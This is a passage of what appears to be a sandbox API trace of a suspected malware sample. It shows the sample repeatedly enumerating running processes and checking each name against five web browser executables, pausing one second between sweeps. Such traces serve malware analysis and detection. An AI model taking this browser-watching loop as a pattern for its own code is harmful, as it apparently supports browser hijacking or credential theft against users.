lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0225.488] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0225.488] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0225.488] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0225.488] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0225.488] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.488] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0225.488] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0225.488] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0225.489] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0225.489] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0225.489] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.489] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0225.489] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0225.489] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0225.489] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0225.489] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0225.489] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.489] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0225.490] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0225.490] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0225.490] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0225.490] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0225.490] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.490] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0225.491] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0225.491] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0225.491] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0225.491] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0225.510] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.510] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.510] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0225.511] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0225.511] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0225.511] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0225.511] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.511] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.511] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.511] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.511] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.511] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.511] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.511] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0225.512] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0225.512] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0225.512] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0225.512] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0225.512] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.512] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.513] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.513] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.513] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.513] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.513] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.513] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0225.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0225.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0225.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0225.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.514] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.514] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.514] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.514] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.514] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0225.514] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.514] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0225.515] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0225.515] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0225.515] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0225.515] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0225.515] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.515] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0225.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0225.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0225.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0225.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.516] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.516] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.516] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.517] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.517] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0225.517] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.517] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.517] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.517] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.517] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.517] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0225.517] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.517] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.518] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.518] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.518] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.518] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0225.518] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.518] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.519] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0225.519] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0225.519] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0225.519] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0225.519] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.519] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0225.519] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0225.519] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0225.520] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0225.520] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0225.520] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0225.520] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0225.520] CloseHandle (hObject=0xe8) returned 1 [0225.520] Sleep (dwMilliseconds=0x3e8) [0226.521] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0226.523] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.524] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0226.524] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0226.524] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0226.524] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0226.524] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0226.524] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0226.525] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0226.525] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0226.525] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0226.525] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0226.525] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0226.525] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0226.525] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0226.526] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0226.526] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0226.526] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0226.526] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.526] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.526] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0226.526] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0226.526] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0226.526] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0226.526] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.526] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0226.527] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0226.527] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0226.527] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0226.527] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0226.527] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.527] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.528] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0226.528] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0226.528] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0226.528] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0226.528] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.528] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0226.528] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0226.528] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0226.528] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0226.528] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0226.529] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.529] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0226.529] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0226.529] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0226.529] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0226.529] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0226.529] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.529] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0226.530] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0226.530] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0226.530] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0226.530] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0226.530] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.530] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0226.531] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0226.531] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0226.531] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0226.531] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0226.531] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.531] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.531] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.531] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.531] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.531] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.532] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.532] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.532] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.532] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.532] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.532] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.532] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.532] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.533] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.533] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.533] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.533] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.533] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.533] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.534] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.534] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.534] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0226.535] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0226.535] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0226.535] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0226.535] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0226.535] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.535] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.535] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.535] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.535] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.535] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.536] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.536] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.536] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.536] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.536] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.536] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.536] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.536] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, 